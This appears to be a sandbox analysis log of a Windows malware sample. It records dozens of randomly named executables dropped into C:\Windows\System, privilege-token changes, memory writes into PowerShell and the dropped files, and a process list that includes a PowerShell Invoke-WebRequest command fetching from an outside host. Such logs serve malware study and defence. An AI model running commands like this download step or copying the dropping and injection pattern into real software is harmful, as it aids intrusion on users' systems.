File created C:\Windows\System\ipXhBMa.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\daJWimr.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\VVoimxp.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\IHYuQcW.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\VjZBvTT.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\zqiNTne.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\bQyFVxN.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\kHcOwas.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\ChTdOzE.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\wOfcuHD.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\IHHGsEi.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\lTOaWiZ.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\IlvhvjL.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\faLtuJB.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\NCvzJRl.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\JCGKlYs.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\fwncReb.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\HLLtLuu.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\uddWuGo.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2356 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\FfVndNF.exe
PID 2356 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\FfVndNF.exe
PID 2356 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\FfVndNF.exe
PID 2356 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\llSHySI.exe
PID 2356 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\llSHySI.exe
PID 2356 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\llSHySI.exe
PID 2356 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\wVXsIox.exe
PID 2356 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\wVXsIox.exe
PID 2356 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\wVXsIox.exe
PID 2356 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\CYaIgYH.exe
PID 2356 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\CYaIgYH.exe
PID 2356 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\CYaIgYH.exe
PID 2356 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\nVbdTzY.exe
PID 2356 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\nVbdTzY.exe
PID 2356 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\nVbdTzY.exe
PID 2356 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\tMgOoUw.exe
PID 2356 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\tMgOoUw.exe
PID 2356 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\tMgOoUw.exe
PID 2356 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\dAQyTqN.exe
PID 2356 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\dAQyTqN.exe
PID 2356 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\dAQyTqN.exe
PID 2356 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\dYzsBxK.exe
PID 2356 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\dYzsBxK.exe
PID 2356 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\dYzsBxK.exe
PID 2356 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\DAFYvPk.exe
PID 2356 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\DAFYvPk.exe
PID 2356 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\DAFYvPk.exe
PID 2356 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\FfKsjAm.exe
PID 2356 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\FfKsjAm.exe
PID 2356 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\FfKsjAm.exe
PID 2356 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\jtCxZJv.exe
PID 2356 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\jtCxZJv.exe
PID 2356 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\jtCxZJv.exe
PID 2356 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\tJOEUEw.exe
PID 2356 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\tJOEUEw.exe
PID 2356 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\tJOEUEw.exe
PID 2356 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\TpkqoNA.exe
PID 2356 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\TpkqoNA.exe
PID 2356 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\TpkqoNA.exe
PID 2356 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\vDLlHmF.exe
PID 2356 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\vDLlHmF.exe
PID 2356 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\vDLlHmF.exe
PID 2356 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\IwRawcL.exe
PID 2356 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\IwRawcL.exe
PID 2356 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\IwRawcL.exe
PID 2356 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\CjQgaty.exe
PID 2356 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\CjQgaty.exe
PID 2356 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\CjQgaty.exe
PID 2356 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\odTtZfG.exe
PID 2356 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\odTtZfG.exe
PID 2356 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\odTtZfG.exe
PID 2356 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\LYiABLS.exe
PID 2356 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\LYiABLS.exe
PID 2356 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\LYiABLS.exe
PID 2356 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\MowaUVv.exe
PID 2356 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\MowaUVv.exe
PID 2356 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\MowaUVv.exe
PID 2356 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\VqFbeRe.exe
PID 2356 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\VqFbeRe.exe
PID 2356 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\VqFbeRe.exe
PID 2356 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\ABLgFgU.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe

"C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\FfVndNF.exe

C:\Windows\System\FfVndNF.exe

C:\Windows\System\llSHySI.exe

C:\Windows\System\llSHySI.exe

C:\Windows\System\wVXsIox.exe

C:\Windows\System\wVXsIox.exe

C:\Windows\System\CYaIgYH.exe

C:\Windows\System\CYaIgYH.exe

C:\Windows\System\nVbdTzY.exe

C:\Windows\System\nVbdTzY.exe

C:\Windows\System\tMgOoUw.exe

C:\Windows\System\tMgOoUw.exe

C:\Windows\System\dAQyTqN.exe

C:\Windows\System\dAQyTqN.exe

C:\Windows\System\dYzsBxK.exe

C:\Windows\System\dYzsBxK.exe

C:\Windows\System\DAFYvPk.exe

C:\Windows\System\DAFYvPk.exe

C:\Windows\System\FfKsjAm.exe

C:\Windows\System\FfKsjAm.exe

C:\Windows\System\jtCxZJv.exe

C:\Windows\System\jtCxZJv.exe

C:\Windows\System\tJOEUEw.exe

C:\Windows\System\tJOEUEw.exe

C:\Windows\System\TpkqoNA.exe

C:\Windows\System\TpkqoNA.exe

C:\Windows\System\vDLlHmF.exe

C:\Windows\System\vDLlHmF.exe

C:\Windows\System\IwRawcL.exe

C:\Windows\System\IwRawcL.exe

C:\Windows\System\CjQgaty.exe

C:\Windows\System\CjQgaty.exe

C:\Windows\System\odTtZfG.exe

C:\Windows\System\odTtZfG.exe

C:\Windows\System\LYiABLS.exe

C:\Windows\System\LYiABLS.exe

C:\Windows\System\MowaUVv.exe

C:\Windows\System\MowaUVv.exe

C:\Windows\System\VqFbeRe.exe

C:\Windows\System\VqFbeRe.exe

C:\Windows\System\ABLgFgU.exe

C:\Windows\System\ABLgFgU.exe

C:\Windows\System\kQKSDoh.exe

C:\Windows\System\kQKSDoh.exe

C:\Windows\System\MvLfXbp.exe

C:\Windows\System\MvLfXbp.exe

C:\Windows\System\vxHpUDx.exe

C:\Windows\System\vxHpUDx.exe

C:\Windows\System\UPqFffY.exe

C:\Windows\System\UPqFffY.exe

C:\Windows\System\jsUsKBi.exe

C:\Windows\System\jsUsKBi.exe

C:\Windows\System\mUwtJJg.exe

C:\Windows\System\mUwtJJg.exe

C:\Windows\System\jkhrtYs.exe

C:\Windows\System\jkhrtYs.exe

C:\Windows\System\FqgWpFu.exe

C:\Windows\System\FqgWpFu.exe

C:\Windows\System\AlpnrbW.exe

C:\Windows\System\AlpnrbW.exe

C:\Windows\System\EUTgGGF.exe

C:\Windows\System\EUTgGGF.exe

C:\Windows\System\OcaOFDU.exe

C:\Windows\System\OcaOFDU.exe

C:\Windows\System\EAdZMyE.exe

C:\Windows\System\EAdZMyE.exe

C:\Windows\System\cPOEsuV.exe

C:\Windows\System\cPOEsuV.exe

C:\Windows\System\vXLzwzF.exe

C:\Windows\System\vXLzwzF.exe

C:\Windows\System\dZGEQAE.exe

C:\Windows\System\dZGEQAE.exe

C:\Windows\System\IVCRiIc.exe

C:\Windows\System\IVCRiIc.exe

C:\Windows\System\jlBVpnZ.exe

C:\Windows\System\jlBVpnZ.exe

C:\Windows\System\FyQuPiQ.exe

C:\Windows\System\FyQuPiQ.exe

C:\Windows\System\ZASCigA.exe

C:\Windows\System\ZASCigA.exe

C:\Windows\System\UxKEWZL.exe

C:\Windows\System\UxKEWZL.exe

C:\Windows\System\QCeCoJv.exe

C:\Windows\System\QCeCoJv.exe

C:\Windows\System\EDmVOab.exe

C:\Windows\System\EDmVOab.exe

C:\Windows\System\ApjYVYN.exe

C:\Windows\System\ApjYVYN.exe

C:\Windows\System\ZjHKYod.exe

C:\Windows\System\ZjHKYod.exe

C:\Windows\System\RdzDpmX.exe

C:\Windows\System\RdzDpmX.exe

C:\Windows\System\CNRcKwk.exe

C:\Windows\System\CNRcKwk.exe

C:\Windows\System\zoIQNEl.exe

C:\Windows\System\zoIQNEl.exe

C:\Windows\System\LlIUSxq.exe

C:\Windows\System\LlIUSxq.exe

C:\Windows\System\wqbfAyo.exe

C:\Windows\System\wqbfAyo.exe

C:\Windows\System\KthHqDt.exe

C:\Windows\System\KthHqDt.exe

C:\Windows\System\dkTaZiN.exe

C:\Windows\System\dkTaZiN.exe

C:\Windows\System\VlMBuLn.exe

C:\Windows\System\VlMBuLn.exe

C:\Windows\System\LxzUaMH.exe

C:\Windows\System\LxzUaMH.exe

C:\Windows\System\glTqwZY.exe

C:\Windows\System\glTqwZY.exe

C:\Windows\System\JWnFRMg.exe

C:\Windows\System\JWnFRMg.exe

C:\Windows\System\uWAtFtU.exe

C:\Windows\System\uWAtFtU.exe

C:\Windows\System\hfmKEWY.exe

C:\Windows\System\hfmKEWY.exe

C:\Windows\System\CGFRojJ.exe

C:\Windows\System\CGFRojJ.exe

C:\Windows\System\DfHkAPi.exe

C:\Windows\System\DfHkAPi.exe

C:\Windows\System\XdLDBmI.exe

C:\Windows\System\XdLDBmI.exe

C:\Windows\System\BSQHlQE.exe

C:\Windows\System\BSQHlQE.exe

C:\Windows\System\VRkTqzr.exe

C:\Windows\System\VRkTqzr.exe

C:\Windows\System\EqwEVjB.exe

C:\Windows\System\EqwEVjB.exe

C:\Windows\System\EpHPlSp.exe

C:\Windows\System\EpHPlSp.exe

C:\Windows\System\NTNtJjl.exe

C:\Windows\System\NTNtJjl.exe

C:\Windows\System\UhhVLzA.exe

C:\Windows\System\UhhVLzA.exe

C:\Windows\System\VPgtBqz.exe

C:\Windows\System\VPgtBqz.exe

C:\Windows\System\JqTkqrL.exe

C:\Windows\System\JqTkqrL.exe

C:\Windows\System\vHAtLpc.exe

C:\Windows\System\vHAtLpc.exe

C:\Windows\System\efiCEgF.exe

C:\Windows\System\efiCEgF.exe

C:\Windows\System\nhOePKn.exe

C:\Windows\System\nhOePKn.exe

C:\Windows\System\IgjmrvK.exe

C:\Windows\System\IgjmrvK.exe

C:\Windows\System\qRSotvM.exe

C:\Windows\System\qRSotvM.exe

C:\Windows\System\NsbnwUN.exe

C:\Windows\System\NsbnwUN.exe

C:\Windows\System\YdyrShH.exe

C:\Windows\System\YdyrShH.exe

C:\Windows\System\yRZZGgO.exe

C:\Windows\System\yRZZGgO.exe

C:\Windows\System\lQyCldl.exe

C:\Windows\System\lQyCldl.exe

C:\Windows\System\idGIjIm.exe

C:\Windows\System\idGIjIm.exe

C:\Windows\System\sdoZCVz.exe

C:\Windows\System\sdoZCVz.exe

C:\Windows\System\ycAyoAv.exe

C:\Windows\System\ycAyoAv.exe

C:\Windows\System\yGRrTcz.exe

C:\Windows\System\yGRrTcz.exe

C:\Windows\System\FaIqosc.exe

C:\Windows\System\FaIqosc.exe

C:\Windows\System\QcYdgkl.exe

C:\Windows\System\QcYdgkl.exe

C:\Windows\System\luNKixn.exe

C:\Windows\System\luNKixn.exe

C:\Windows\System\YdlsEAG.exe

C:\Windows\System\YdlsEAG.exe

C:\Windows\System\lRmqrav.exe

C:\Windows\System\lRmqrav.exe

C:\Windows\System\QaSUxDG.exe

C:\Windows\System\QaSUxDG.exe

C:\Windows\System\dBwajJv.exe

C:\Windows\System\dBwajJv.exe

C:\Windows\System\IbReEwZ.exe

C:\Windows\System\IbReEwZ.exe

C:\Windows\System\MQSJxYf.exe

C:\Windows\System\MQSJxYf.exe

C:\Windows\System\BnZiziY.exe

C:\Windows\System\BnZiziY.exe

C:\Windows\System\PNUCirP.exe

C:\Windows\System\PNUCirP.exe

C:\Windows\System\OchXgvv.exe

C:\Windows\System\OchXgvv.exe

C:\Windows\System\jWjvQmg.exe

C:\Windows\System\jWjvQmg.exe

C:\Windows\System\idADXUA.exe

C:\Windows\System\idADXUA.exe

C:\Windows\System\WGvWsda.exe

C:\Windows\System\WGvWsda.exe

C:\Windows\System\cfXxorw.exe

C:\Windows\System\cfXxorw.exe

C:\Windows\System\mhzOsIv.exe

C:\Windows\System\mhzOsIv.exe

C:\Windows\System\GlJHgzK.exe

C:\Windows\System\GlJHgzK.exe

C:\Windows\System\PmFITdt.exe

C:\Windows\System\PmFITdt.exe

C:\Windows\System\jqayqRL.exe

C:\Windows\System\jqayqRL.exe

C:\Windows\System\fdqCJcY.exe

C:\Windows\System\fdqCJcY.exe

C:\Windows\System\eXzrlsY.exe

C:\Windows\System\eXzrlsY.exe

C:\Windows\System\mgHGfqZ.exe

C:\Windows\System\mgHGfqZ.exe

C:\Windows\System\GwGPUgF.exe

C:\Windows\System\GwGPUgF.exe

C:\Windows\System\fCOsPWd.exe

C:\Windows\System\fCOsPWd.exe

C:\Windows\System\vVezwdf.exe

C:\Windows\System\vVezwdf.exe

C:\Windows\System\YlJLKKZ.exe

C:\Windows\System\YlJLKKZ.exe

C:\Windows\System\vllATZb.exe

C:\Windows\System\vllATZb.exe

C:\Windows\System\xPjSoSB.exe

C:\Windows\System\xPjSoSB.exe

C:\Windows\System\uqjPXpv.exe

C:\Windows\System\uqjPXpv.exe

C:\Windows\System\XtivMYF.exe

C:\Windows\System\XtivMYF.exe

C:\Windows\System\XXAwyNb.exe

C:\Windows\System\XXAwyNb.exe

C:\Windows\System\OpYZLJl.exe

C:\Windows\System\OpYZLJl.exe

C:\Windows\System\fLXVCrh.exe

C:\Windows\System\fLXVCrh.exe

C:\Windows\System\DmyjBNT.exe

C:\Windows\System\DmyjBNT.exe

C:\Windows\System\ETnLKyx.exe

C:\Windows\System\ETnLKyx.exe

C:\Windows\System\hXVtKsx.exe

C:\Windows\System\hXVtKsx.exe

C:\Windows\System\dNYGjPg.exe

C:\Windows\System\dNYGjPg.exe

C:\Windows\System\joCaKCf.exe

C:\Windows\System\joCaKCf.exe

C:\Windows\System\btWAUBQ.exe

C:\Windows\System\btWAUBQ.exe

C:\Windows\System\MuyNtTZ.exe

C:\Windows\System\MuyNtTZ.exe

C:\Windows\System\VluuUJi.exe

C:\Windows\System\VluuUJi.exe

C:\Windows\System\saipWPw.exe

C:\Windows\System\saipWPw.exe

C:\Windows\System\bZzroct.exe

C:\Windows\System\bZzroct.exe

C:\Windows\System\LAtQjtM.exe

C:\Windows\System\LAtQjtM.exe

C:\Windows\System\FrmRuSa.exe

C:\Windows\System\FrmRuSa.exe

C:\Windows\System\thamIKK.exe

C:\Windows\System\thamIKK.exe

C:\Windows\System\IRgghbj.exe

C:\Windows\System\IRgghbj.exe

C:\Windows\System\fNvzjbJ.exe

C:\Windows\System\fNvzjbJ.exe

C:\Windows\System\wDQaQUQ.exe

C:\Windows\System\wDQaQUQ.exe

C:\Windows\System\mLCvNUh.exe

C:\Windows\System\mLCvNUh.exe

C:\Windows\System\pJOMEVV.exe

C:\Windows\System\pJOMEVV.exe

C:\Windows\System\sCjOAyt.exe

C:\Windows\System\sCjOAyt.exe

C:\Windows\System\oqZSiWW.exe

C:\Windows\System\oqZSiWW.exe

C:\Windows\System\mmDDKEX.exe

C:\Windows\System\mmDDKEX.exe

C:\Windows\System\BTFZHUH.exe

C:\Windows\System\BTFZHUH.exe

C:\Windows\System\lHTfMpQ.exe

C:\Windows\System\lHTfMpQ.exe

C:\Windows\System\PorGvGW.exe

C:\Windows\System\PorGvGW.exe

C:\Windows\System\bglhYpo.exe

C:\Windows\System\bglhYpo.exe

C:\Windows\System\MjrbZJp.exe

C:\Windows\System\MjrbZJp.exe

C:\Windows\System\YDVsxEs.exe

C:\Windows\System\YDVsxEs.exe

C:\Windows\System\wsKQjnz.exe

C:\Windows\System\wsKQjnz.exe

C:\Windows\System\opfmdls.exe

C:\Windows\System\opfmdls.exe

C:\Windows\System\DQgmOOt.exe

